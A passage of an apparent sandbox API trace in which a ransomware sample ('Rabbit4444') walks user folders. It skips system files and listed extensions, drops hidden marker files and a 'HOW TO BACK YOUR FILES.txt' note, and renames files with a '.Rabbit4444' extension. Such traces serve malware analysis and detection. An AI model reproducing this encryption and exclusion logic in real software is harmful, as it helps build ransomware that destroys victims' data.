dwNumberOfBytesToMap=0x0) returned 0x70000 [0053.724] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0053.724] CloseHandle (hObject=0x278) returned 1 [0053.724] CloseHandle (hObject=0x27c) returned 1 [0053.724] GetCurrentThreadId () returned 0xd98 [0053.724] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6370 [0053.724] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys" [0053.724] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10a2f0 | out: hHeap=0xe0000) returned 1 [0053.724] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6368 | out: hHeap=0xe0000) returned 1 [0053.724] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys" [0053.724] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\" [0053.724] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\.BFC0E91B00AE8A0620D3" [0053.724] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0053.726] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0053.728] FlushFileBuffers (hFile=0x27c) returned 1 [0053.729] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0053.730] CloseHandle (hObject=0x27c) returned 1 [0053.730] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys") returned 94 [0053.730] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0053.730] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe53f4df4, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0x1a57fc00, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0xe9594709, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102410 [0053.730] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.730] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0053.730] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0053.730] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0053.730] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe53f4df4, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0x1a57fc00, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0xe9594709, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0053.730] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.730] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0053.730] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0053.731] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0053.731] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0053.731] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe695a8e5, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xe6c43548, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xe6c43548, ftLastWriteTime.dwHighDateTime=0x1d32736, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="#aa.online-metrix.net", cAlternateFileName="#AAONL~1.NET")) returned 1 [0053.731] lstrcmpiW (lpString1="#aa.online-metrix.net", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.731] lstrcmpiW (lpString1="#aa.online-metrix.net", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0053.731] lstrcmpiW (lpString1="#aa.online-metrix.net", lpString2="Rabbit4444.exe") returned -1 [0053.731] lstrcmpiW (lpString1="#aa.online-metrix.net", lpString2=".") returned -1 [0053.731] lstrcmpiW (lpString1="#aa.online-metrix.net", lpString2="..") returned -1 [0053.731] lstrcmpiW (lpString1="#aa.online-metrix.net", lpString2="windows") returned -1 [0053.731] lstrcmpiW (lpString1="#aa.online-metrix.net", lpString2="bootmgr") returned -1 [0053.731] lstrcmpiW (lpString1="#aa.online-metrix.net", lpString2="pagefile.sys") returned -1 [0053.731] lstrcmpiW (lpString1="#aa.online-metrix.net", lpString2="boot") returned -1 [0053.731] lstrcmpiW (lpString1="#aa.online-metrix.net", lpString2="ids.txt") returned -1 [0053.731] lstrcmpiW (lpString1="#aa.online-metrix.net", lpString2="NTUSER.DAT") returned -1 [0053.731] lstrcpyW (in: lpString1=0x130ebf6, lpString2="#aa.online-metrix.net" | out: lpString1="#aa.online-metrix.net") returned="#aa.online-metrix.net" [0053.731] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6348 [0053.731] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xea) returned 0x11fe30 [0053.731] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6350 | out: ListHead=0xf68b0, ListEntry=0xf6350) returned 0xf63b0 [0053.731] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe9594709, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe9594709, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe9594709, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0053.731] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.731] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0053.731] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe53f753e, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0x1a57fc00, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x1a57fc00, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x212, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="settings.sol", cAlternateFileName="")) returned 1 [0053.731] lstrcmpiW (lpString1="settings.sol", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0053.731] lstrcmpiW (lpString1="settings.sol", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0053.731] lstrcmpiW (lpString1="settings.sol", lpString2="Rabbit4444.exe") returned 1 [0053.731] lstrcmpiW (lpString1="settings.sol", lpString2=".") returned 1 [0053.731] lstrcmpiW (lpString1="settings.sol", lpString2="..") returned 1 [0053.731] lstrcmpiW (lpString1="settings.sol", lpString2="windows") returned -1 [0053.731] lstrcmpiW (lpString1="settings.sol", lpString2="bootmgr") returned 1 [0053.731] lstrcmpiW (lpString1="settings.sol", lpString2="pagefile.sys") returned 1 [0053.731] lstrcmpiW (lpString1="settings.sol", lpString2="boot") returned 1 [0053.731] lstrcmpiW (lpString1="settings.sol", lpString2="ids.txt") returned 1 [0053.731] lstrcmpiW (lpString1="settings.sol", lpString2="NTUSER.DAT") returned 1 [0053.731] lstrcpyW (in: lpString1=0x130ebf6, lpString2="settings.sol" | out: lpString1="settings.sol") returned="settings.sol" [0053.731] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\settings.sol", dwFileAttributes=0x0) returned 1 [0053.733] lstrlenW (lpString="settings.sol") returned 12 [0053.733] lstrlenW (lpString="Rabbit4444") returned 10 [0053.733] lstrcmpiW (lpString1="ttings.sol", lpString2="Rabbit4444") returned 1 [0053.733] lstrlenW (lpString=".dll") returned 4 [0053.734] lstrcmpiW (lpString1=".sol", lpString2=".dll") returned 1 [0053.734] lstrlenW (lpString=".lnk") returned 4 [0053.734] lstrcmpiW (lpString1=".sol", lpString2=".lnk") returned 1 [0053.734] lstrlenW (lpString=".ini") returned 4 [0053.734] lstrcmpiW (lpString1=".sol", lpString2=".ini") returned 1 [0053.734] lstrlenW (lpString=".sys") returned 4 [0053.734] lstrcmpiW (lpString1=".sol", lpString2=".sys") returned -1 [0053.734] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\settings.sol" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\settings.sol"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0053.734] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0053.734] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14504472334) returned 1 [0053.734] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=530) returned 1 [0053.734] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1177e8 [0053.734] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101380 [0053.734] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x520, lpName=0x0) returned 0x298 [0053.742] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x520) returned 0x70000 [0053.743] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0053.743] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0053.743] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0053.743] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0053.743] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0053.743] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0053.743] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0053.743] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0053.743] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14505391315) returned 1 [0053.743] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1177e8 | out: hHeap=0xe0000) returned 1 [0053.743] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101380 | out: hHeap=0xe0000) returned 1 [0053.743] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0053.743] CloseHandle (hObject=0x298) returned 1 [0053.743] CloseHandle (hObject=0x278) returned 1 [0053.743] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\settings.sol.Rabbit4444") returned 118 [0053.744] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\settings.sol" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\settings.sol"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\settings.sol.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\settings.sol.rabbit4444"), dwFlags=0x1) returned 1 [0053.745] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe53f753e, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0x1a57fc00, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x1a57fc00, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x212, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="settings.sol", cAlternateFileName="")) returned 0 [0053.745] FindClose (in: hFindFile=0x102410 | out: hFindFile=0x102410) returned 1 [0053.745] lstrcpyW (in: lpString1=0x130ebf6, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0053.746] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0053.746] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0053.746] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0053.746] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0053.746] CloseHandle (hObject=0x278) returned 1 [0053.746] CloseHandle (hObject=0x27c) returned 1 [0053.747] GetCurrentThreadId () returned 0xd98 [0053.747] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6350 [0053.747] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\#aa.online-metrix.net", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\#aa.online-metrix.net") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\#aa.online-metrix.net" [0053.747] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11fe30 | out: hHeap=0xe0000) returned 1 [0053.747] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6348 | out: hHeap=0xe0000) returned 1 [0053.747] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\#aa.online-metrix.net" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\#aa.online-metrix.net") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\#aa.online-metrix.net" [0053.747] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\#aa.online-metrix.net", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\#aa.online-metrix.net\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\#aa.online-metrix.net\\" [0053.747] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\#aa.online-metrix.net\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\#aa.online-metrix.net\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\#aa.online-metrix.net\\.BFC0E91B00AE8A0620D3" [0053.747] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\#aa.online-metrix.net\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\#aa.online-metrix.net\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0053.748] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0053.767] FlushFileBuffers (hFile=0x27c) returned 1 [0053.767] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\#aa.online-metrix.net\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0053.768] CloseHandle (hObject=0x27c) returned 1 [0053.768] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\#aa.online-metrix.net") returned 116 [0053.768] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0053.768] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\#aa.online-metrix.net\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe695a8e5, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xe6c43548, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xe95b05bb, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1027d0 [0053.768] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.768] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0053.768] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0053.768] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0053.768] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe695a8e5, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xe6c43548, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xe95b05bb, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0053.768] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.769] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0053.769] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0053.769] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0053.769] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0053.769] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe95b05bb, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe95b05bb, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe95fca16, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0053.769] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.769] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0053.769] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe69631a4, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xe6c26071, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xe6c33729, ftLastWriteTime.dwHighDateTime=0x1d32736, nFileSizeHigh=0x0, nFileSizeLow=0xc5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="settings.sol", cAlternateFileName="")) returned 1 [0053.769] lstrcmpiW (lpString1="settings.sol", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0053.769] lstrcmpiW (lpString1="settings.sol", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0053.769] lstrcmpiW (lpString1="settings.sol", lpString2="Rabbit4444.exe") returned 1 [0053.769] lstrcmpiW (lpString1="settings.sol", lpString2=".") returned 1 [0053.769] lstrcmpiW (lpString1="settings.sol", lpString2="..") returned 1 [0053.769] lstrcmpiW (lpString1="settings.sol", lpString2="windows") returned -1 [0053.769] lstrcmpiW (lpString1="settings.sol", lpString2="bootmgr") returned 1 [0053.769] lstrcmpiW (lpString1="settings.sol", lpString2="pagefile.sys") returned 1 [0053.769] lstrcmpiW (lpString1="settings.sol", lpString2="boot") returned 1 [0053.769] lstrcmpiW (lpString1="settings.sol", lpString2="ids.txt") returned 1 [0053.769] lstrcmpiW (lpString1="settings.sol", lpString2="NTUSER.DAT") returned 1 [0053.769] lstrcpyW (in: lpString1=0x130ec22, lpString2="settings.sol" | out: lpString1="settings.sol") returned="settings.sol" [0053.769] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\#aa.online-metrix.net\\settings.sol", dwFileAttributes=0x0) returned 1 [0053.770] lstrlenW (lpString="settings.sol") returned 12 [0053.770] lstrlenW (lpString="Rabbit4444") returned 10 [0053.770] lstrcmpiW (lpString1="ttings.sol", lpString2="Rabbit4444") returned 1 [0053.770] lstrlenW (lpString=".dll") returned 4 [0053.770] lstrcmpiW (lpString1=".sol", lpString2=".dll") returned 1 [0053.770] lstrlenW (lpString=".lnk") returned 4 [0053.770] lstrcmpiW (lpString1=".sol", lpString2=".lnk") returned 1 [0053.770] lstrlenW (lpString=".ini") returned 4 [0053.770] lstrcmpiW (lpString1=".sol", lpString2=".ini") returned 1 [0053.770] lstrlenW (lpString=".sys") returned 4 [0053.770] lstrcmpiW (lpString1=".sol", lpString2=".sys") returned -1 [0053.770] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\#aa.online-metrix.net\\settings.sol" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\#aa.online-metrix.net\\settings.sol"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0053.770] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0053.770] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14508110360) returned 1 [0053.770] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=197) returned 1 [0053.770] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117a40 [0053.770] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101d98 [0053.771] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x3d0, lpName=0x0) returned 0x298 [0053.772] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3d0) returned 0x70000 [0053.773] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0053.773] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 